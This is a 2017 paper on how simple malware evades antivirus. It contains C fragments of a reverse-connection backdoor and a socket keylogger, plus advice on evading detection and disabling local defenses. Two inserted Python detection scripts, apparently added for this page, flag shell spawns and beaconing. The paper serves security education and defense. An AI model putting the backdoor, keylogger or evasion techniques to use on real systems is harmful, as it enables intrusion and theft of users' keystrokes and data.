Bypass an antivirus: too simple

Trivial Techniques for Evading and Solutions to Defend

Author: Stefano Gorresio
Date: 04 May 2017

Index

1) Premise
2) Testing Environment
3) Introduction
4) There are more ways to solve the same problem
5) Examples
   a) Executable Backdoor
   b) Remote Keylogger
   c) Script Malware
6) Conclusion
   a) Techniques for evading AV
   b) Techniques for defense
7) Note

1) Premise

This document is not exhaustive; it is intended only to show how an antivirus can be ineffective in many situations. The topic is treated in a very superficial way. This is not a complete guide that illustrates AV evasion techniques, but only an informative document. This document is a report of many tests made by me over the years. Everything written in this document has been tested several times.
Any test done will be described so that it can be reproduced by anyone. This simple analysis does not claim that antivirus should not be used... in fact, an antivirus must be used, but it should not be considered a complete and exhaustive defense system. The content exposed in this paper is nothing new, but given the analyses made and the "strange ideas" that people and companies have about computer security, it seemed right to publish some considerations. These malware are simple and obvious, but as tested, they proved fully functional in some penetration tests. The full source code of these malware is not public for now. This document was written for informative and didactic reasons. I apologize if my English is bad. XD

2) Testing Environment

All targets are computers with Microsoft Windows (Windows 10 and Windows Server 2016) and all attackers are computers with GNU/Linux (Arch Linux and Kali Linux). The malware were tested on the VirusTotal service and directly on Windows Defender, Avira and McAfee (trial version). Other tests were done occasionally on Sophos. The malware are programmed for Windows in C (compiled with gcc) and in x86/x86_64 Assembly (compiled with FASM), and the C&C server/client is programmed in Python 2.7 (working also on Windows). These analyses were performed in a distributed and non-continuous way from 2012 (the year when I became interested in malware) to date.

Below is the list of malware programmed (or downloaded) and used for testing:

• BackDoor17: reverse connection backdoor programmed in C for Microsoft Windows. Executes cmd and PowerShell commands received from the remote host.
• RemoteKeylogger: bind connection keylogger programmed in x86 Assembly (32-bit exe) for Microsoft Windows. Sends the pressed keys to the remote host.
• RemoteKeylogger17: reverse connection keylogger programmed in C for Microsoft Windows. Sends the pressed keys to the remote server. Porting of a keylogger programmed in 2014 (RemoteKeylogger).
• Metasploit Payloads: payloads (e.g. reverse shell) included in the Metasploit Framework.

Some of these programs were written for tests and are not fully adequate for a penetration test (although they can be used without problems).

3) Introduction

Many people and companies are convinced that IT security can be managed only with the use of a good antivirus. Furthermore, there is a common belief that a malware that can evade AV must be complex, advanced software: polymorphic, smart, etc. Wrong… The best way to bypass an antivirus is simplicity and banality in programming. Usually malware are stupid programs that do simple things like running commands, connecting remotely, replicating, and so on. If a malware acts like a regular program, the AV does not deem it malicious.

4) There are more ways to solve the same problem

Let's make an example... Most of the reverse shells that can be found on the Internet are easily detected by AV. But if we want to use a reverse shell on a Windows Server machine (unfortunately the most used operating system for servers in Italy) with an antivirus that does its job well against backdoors, what can we do? The first question to ask is: what exactly do I want? A reverse shell (in any form) is usually used to execute shell commands remotely and see the output of the commands sent. The problem may then change from "how do I run a reverse shell?" to "how do I execute commands remotely and see the output?". The problem is the same, but honestly I find it more convenient to ask the question the other way.

Instead of using a reverse shell that is already programmed, we try to program it in C. Many reverse shells for Microsoft Windows work like this:

1. Initialize and create a socket
2. Connect to the C&C server (the attacker's host or a specifically dedicated server)
3. Call the CreateProcess function with cmd.exe and with stdin, stdout and stderr redirected to the socket

The third point is the one that could give serious problems.
Creating a connection to a host is not malicious, but running cmd.exe with "the flow" redirected to the socket just created is quite suspect. Note: an antivirus does not tend to analyze only a single part of the code; it tends to analyze everything. An antivirus can consider a call to an API suspect or harmless also on the basis, for example, of calls or operations carried out previously. To achieve our goal, is it mandatory to use CreateProcess, launch cmd.exe and attach the socket? Thankfully (or unfortunately) no. We can trivially try the following reasoning:

What should our program do? It must connect to a remote host, receive commands (receive data), execute shell commands locally and send the output (send data).
What can we already do without any problem? We can connect to a remote host and send and receive data.
What are we missing? Running shell commands locally.

The problem then becomes "how do I execute shell commands locally and save the output in a buffer (for subsequent transfer)?". The answer is found in the _popen function.[1]

FILE *pipe = _popen(char *command, "rt");

pipe = output (data that will be sent)
command = input (received data)

Now we just have to connect everything.

uint8_t esegui(FILE *pipe, char *data, SOCKET s){
    char *data_pt = data;
    if((pipe=_popen(data, "rt")) == NULL)   // Execute Command
        return 1;
    while(fgets(data_pt, MAX_SIZE, pipe))   // Send Output, one line at a time
        if(send(s, data, strlen(data), 0) < 0){
            _pclose(pipe);                  // do not leak the pipe on a send error
            return 1;
        }
    _pclose(pipe);
    return 0;
}

For each command received, multiple outputs are sent (one line at a time). This code works, but it is not optimized.[2] But for us this is enough.

…

Our backdoor programmed in C works and the antivirus is not a problem. The reasoning and the work done are stupid, but very effective. It's true! We have realized a simple backdoor… but the procedure for programming a complex persistent backdoor, with encrypted connection, able to handle all the exceptions and be "robust at all", does not change.
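The reasoning above explains why a check that keys on CreateProcess-plus-socket misses the _popen variant. A behaviour-level check, which looks at what the process does rather than which API it called, still sees the same thing: on Windows the C runtime's _popen runs the command through the command interpreter, so a process that holds an outbound connection and then repeatedly spawns cmd.exe shows up in process-creation and network telemetry. The following Python script is an added example written for this page, not code from the paper or from BackDoor17. The record layout is only loosely modelled on Sysmon event IDs 1 and 3; the field names, the time window and every record are constructed assumptions.

```python
"""Correlate process-creation and network-connection telemetry: flag a process
that first opens an outbound connection and then spawns a command interpreter.
The record layout loosely mimics Sysmon Event ID 1 (process create) and
Event ID 3 (network connect); field names and all records below are constructed
for this example, not real telemetry."""
from collections import defaultdict
from datetime import datetime

# Command interpreters whose appearance as a child of a networked process matters here.
SHELLS = {"cmd.exe", "powershell.exe"}

# Constructed sample:
#  - pid 4120 (update.exe) connects out, then spawns cmd.exe twice (the _popen pattern)
#  - pid 3300 (outlook.exe) only connects out
#  - pid 900 (explorer.exe) spawns cmd.exe with no prior network activity (a user opening a prompt)
SAMPLE_EVENTS = [
    {"ts": "2017-05-04T10:00:01", "id": 3, "pid": 4120,
     "image": r"C:\Users\u\update.exe", "dst": "203.0.113.10:8443"},
    {"ts": "2017-05-04T10:00:02", "id": 3, "pid": 3300,
     "image": r"C:\Program Files\Office\outlook.exe", "dst": "198.51.100.7:443"},
    {"ts": "2017-05-04T10:00:05", "id": 1, "pid": 4121, "ppid": 4120,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"ts": "2017-05-04T10:00:09", "id": 1, "pid": 4122, "ppid": 4120,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c ipconfig"},
    {"ts": "2017-05-04T10:01:00", "id": 1, "pid": 950, "ppid": 900,
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
]


def basename(path):
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events, window_s=600):
    """Return one alert per (parent image, parent pid, destination) where the
    parent made an outbound connection and, within window_s seconds, spawned a
    shell. Each alert carries the child command lines in time order."""
    connected = {}            # pid -> (time, image, dst) of its latest outbound connect
    hits = defaultdict(list)  # (image, pid, dst) -> child command lines
    for e in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(e["ts"])
        if e["id"] == 3:
            connected[e["pid"]] = (t, e["image"], e["dst"])
        elif e["id"] == 1 and basename(e["image"]) in SHELLS:
            parent = connected.get(e["ppid"])
            if parent and (t - parent[0]).total_seconds() <= window_s:
                hits[(parent[1], e["ppid"], parent[2])].append(e["cmdline"])
    return [(img, pid, dst, cmds) for (img, pid, dst), cmds in hits.items()]


if __name__ == "__main__":
    for img, pid, dst, cmds in correlate(SAMPLE_EVENTS):
        print(f"ALERT pid={pid} {img} -> {dst}; spawned {len(cmds)} shell(s): {cmds}")
```

The point of the correlation is that it is indifferent to the API: CreateProcess with redirected handles and _popen both end in a cmd.exe child of a process that already has a socket open. Legitimate programs that spawn shells (installers, build tools) will need an allowlist on the parent image; the window keeps a user opening a prompt hours after an update check from tripping the rule.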
I confirm what many people say... The best solution is the simplest and most banal one.

5) Examples

a) Executable Backdoor

A backdoor is a program that allows access to a system ignoring any authentication, etc. They are usually programs that allow the execution of shell commands remotely, often managing the remote connection (a webshell does not handle the connection). A good backdoor must be undetectable (by AV and humans), should be able to handle all exceptions (especially on sockets), the communication between target and attacker must be cryptographically secure (carrying confidential data across the Internet in clear during a penetration test is not very nice) and it must be persistent (for long-term access). I personally prefer "reverse" connections (from target to attacker) simply because they are the least annoying to manage, and I noticed that they tend to be less detectable.

BackDoor17 is a reverse connection backdoor programmed in C that allows the execution of arbitrary commands on Microsoft Windows. The program netcat is sufficient and great for controlling the backdoor. The connection is not encrypted. This backdoor is not designed for long-term access. When this backdoor is run, it tries to connect to a TCP socket specified at programming time. At each connection closing (or any connection problem), the program waits for a number of seconds (I have set 30 seconds) before trying to reconnect. The following are the commands that can be performed:

<command>                Windows cmd.exe commands
powershell <command>     PowerShell commands
exit                     Close connection (retry after 30 seconds)
kill                     Kill backdoor (terminate process)

To handle the connection the Winsock2 API is used. To execute shell commands the _popen function is used. Creating a connection to a host is not a malevolent action. Calling the _popen function is not a malevolent action. The whole is not detected as malicious. This backdoor is very useful as a "first access backdoor".
By running this backdoor on Windows Server with sufficient permissions you can easily disable the local security systems (antivirus, agent, etc.) and then load a more powerful and more detectable backdoor (e.g. Meterpreter).

Note: The > character is optional and indicates when the command is typed.

b) Remote Keylogger

A keylogger is a program that intercepts keystrokes and stores them in a file or sends them to a remote server. In my research, I programmed and analyzed two keyloggers with the same "capture" operation, but programmed differently and with different connection management. RemoteKeylogger is a bind connection keylogger and it was programmed in x86 Assembly (32-bit). On VirusTotal, it was detected by 6/59 AV. I programmed it in 2014. RemoteKeylogger17 is a reverse connection keylogger and it was programmed in C (64-bit). On VirusTotal, it was detected by 1/61 AV. In both keyloggers the "capture keys" algorithm is the same, but the machine instructions, the architecture and the type of connection change. The call to the API is the same in both. netcat is a great client/server. The socket management code is identical for RemoteKeylogger17 and for BackDoor17. Once a data transmission fault happens, RemoteKeylogger17 waits a defined time (30 seconds) before trying again to connect to the server. To capture keystrokes, the GetAsyncKeyState function is used to check whether a specific key is pressed at that instant. Every 80 milliseconds a scan is performed on some keys of interest (letters, numbers, shift, space, enter, etc.) and if at that moment a button is pressed, the key encoded in ASCII is sent to the remote server. This is the classic behavior of many keyloggers on Windows.[3]

Below, a part of the RemoteKeylogger17 code that checks the keys with virtual-key codes from 48 (0x30) to 90 (0x5A).
for(i=0x30; i<0x5B; i++)
    if(GetAsyncKeyState(i)){   // Check if the button is pressed
        str_pt[0] = i;
        if(send(s, str_pt, 1, 0) < 0)
            return;
    }

The entire code must obviously be improved. i is a uint8_t, str_pt is a char *, s is a SOCKET.

Note: As can be seen in the figure above, the timeout after the detection of a pressed key should be properly adjusted (single sleep of 80 ms). The ^ character indicates a Shift press.

c) Script Malware

Many malware are simple scripts (e.g. webshell, VBS, bash, etc.). Malware scripts are usually less detectable than the others. Let's take an example. For the same payload (e.g. windows/x64/meterpreter/reverse_https of the Metasploit Framework), a VBS is less detectable than an executable exe. Webshells are less detectable.

Note: It's true, an aspx code is not really a script (it is compiled), but from a "malware" point of view it looks more like a script than an executable (which it actually is): from an attacker's point of view it is treated as a script (source code is loaded, not executable code) and antivirus seems to see it as a script (the detection probabilities are almost identical to those of a script).

6) Conclusion

a) Techniques for evading AV

In a penetration test, personally, I always prefer to use script backdoors. On Windows, as the first access backdoor, I recommend using a PowerShell script (less detectable than a VBS script). On UNIX-like systems, as the first access backdoor, I recommend the use of an sh script (I do not recommend the immediate use of bash and python, as they are not always present). As webshell, I recommend the use of a script controllable directly from the browser (I do not recommend the use of reverse shells: more detectable and more problems with any firewall). If a code is detected by an antivirus, the simplest technique to evade the AV is trying to change the instructions, their order, or the parameters passed to the API. The antivirus analyzes the instructions and the calls to the API, not the algorithm.
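The conclusion above is that the AV looks at instructions and API calls rather than at the algorithm. The examples section also gives a piece of the algorithm that does not change when the instructions do: both executable examples sleep a fixed 30 seconds after every connection failure and then retry. When the server is unreachable, that produces connection attempts at near-constant intervals, which a firewall or flow log records no matter which compiler, architecture or API produced them. The following Python script is an added example, not part of the paper; the key=value log layout, the entries and the thresholds are constructed assumptions.

```python
"""Flag connection series whose inter-arrival times are nearly constant, the
footprint of a client that sleeps a fixed time before reconnecting.
The log lines are constructed for this example in a simple key=value layout;
real firewall or NetFlow exports need their own parser in parse()."""
import re
import statistics
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(r"^(\S+ \S+) src=(\S+) dst=(\S+) dport=(\d+)")

# Constructed sample: 10.0.0.5 retries 203.0.113.10:8443 every ~30 s (jitter of
# a second from timestamp rounding); 10.0.0.9 talks to a web server at irregular
# times; 10.0.0.7 has too few events to judge.
SAMPLE_LOG = """\
2017-05-04 10:00:00 src=10.0.0.5 dst=203.0.113.10 dport=8443 action=allow
2017-05-04 10:00:00 src=10.0.0.9 dst=198.51.100.7 dport=443 action=allow
2017-05-04 10:00:07 src=10.0.0.9 dst=198.51.100.7 dport=443 action=allow
2017-05-04 10:00:30 src=10.0.0.5 dst=203.0.113.10 dport=8443 action=allow
2017-05-04 10:01:01 src=10.0.0.5 dst=203.0.113.10 dport=8443 action=allow
2017-05-04 10:01:30 src=10.0.0.5 dst=203.0.113.10 dport=8443 action=allow
2017-05-04 10:02:00 src=10.0.0.5 dst=203.0.113.10 dport=8443 action=allow
2017-05-04 10:02:31 src=10.0.0.5 dst=203.0.113.10 dport=8443 action=allow
2017-05-04 10:03:40 src=10.0.0.9 dst=198.51.100.7 dport=443 action=allow
2017-05-04 10:04:02 src=10.0.0.9 dst=198.51.100.7 dport=443 action=allow
2017-05-04 10:09:00 src=10.0.0.9 dst=198.51.100.7 dport=443 action=allow
2017-05-04 10:09:30 src=10.0.0.7 dst=192.0.2.44 dport=22 action=allow
2017-05-04 10:10:00 src=10.0.0.7 dst=192.0.2.44 dport=22 action=allow
"""


def parse(log):
    """Group connection timestamps by (src, dst, dport); skip unparseable lines."""
    series = defaultdict(list)
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        series[(m.group(2), m.group(3), int(m.group(4)))].append(ts)
    return series


def beacon_score(timestamps):
    """Return (mean gap in seconds, coefficient of variation of the gaps), or
    None when there are too few events or no time elapses between them."""
    if len(timestamps) < 4:
        return None
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    if mean <= 0:
        return None
    return mean, statistics.pstdev(gaps) / mean


def find_beacons(log, min_events=5, max_cv=0.2):
    """Return [(key, mean gap, cv)] for series with at least min_events
    connections whose gaps vary by no more than max_cv of the mean."""
    out = []
    for key, ts in parse(log).items():
        if len(ts) < min_events:
            continue
        score = beacon_score(ts)
        if score and score[1] <= max_cv:
            out.append((key, round(score[0], 1), round(score[1], 3)))
    return out


if __name__ == "__main__":
    for (src, dst, dport), mean_gap, cv in find_beacons(SAMPLE_LOG):
        print(f"BEACON {src} -> {dst}:{dport} every ~{mean_gap}s (cv={cv})")
```

A low coefficient of variation over enough events is the signal; the exact thresholds depend on how noisy the log source is and on how much jitter the client adds. Scheduled legitimate traffic (NTP, update checks, monitoring agents) is also regular, so the rule is a triage filter that needs a destination allowlist rather than a verdict on its own.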
b) Techniques for defense

To defend against malware, the use of an antivirus is not enough. In computer security one thing is important that many people and many companies do not have: good sense. It is useless to have antivirus, IDS and "enterprise support" at exaggerated cost when you leave credentials (e.g. pfSense, server admin, etc.) at the default values or easily guessable (the most stupid and widespread security hole). Common replicating malware do not replicate through buffer overflows, 0-days or complicated methods; they simply replicate through shared media, specific mechanisms using default credentials or other simple mechanisms left open (almost always out of laziness and not by necessity).

I am convinced that a network must be minimal: it must be modular with the bare minimum. It is useless to have a heavy operating system, with thousands of processes for a variety of things, when in the end you use it only as a file server or web server. The most common result is unstable, underperforming servers that require monstrous hardware to do things for which a Raspberry Pi alone would be enough (I exaggerate, but the reality is not much different). These problems, of course, increase information security risks: too many unnecessary, minimally monitored services and especially too much freedom of movement increase the probability that malware can operate without problems (as well as making cyber attacks easier).

…

All that I have written is obvious, but for many companies and people it does not seem to be so. In conclusion... the antivirus is important (sometimes it plays an important role in computer security), but if you want to use an IT infrastructure also for critical activities, make sure you know well everything you do (for example how the software you are using works), and above all take great care in computer security (cyber security also deals with the robustness of information, not only with its confidentiality).
7) Note

This paper should be used only for educational purposes, analysis and any purpose that does not violate any applicable law. Some screenshots were taken on systems set to the Italian language and some images will have text in Italian.

[1] On the Internet there are many backdoor codes with this functioning.
[2] This code was taken from BackDoor17.
[3] On the Internet, you can find many similar codes.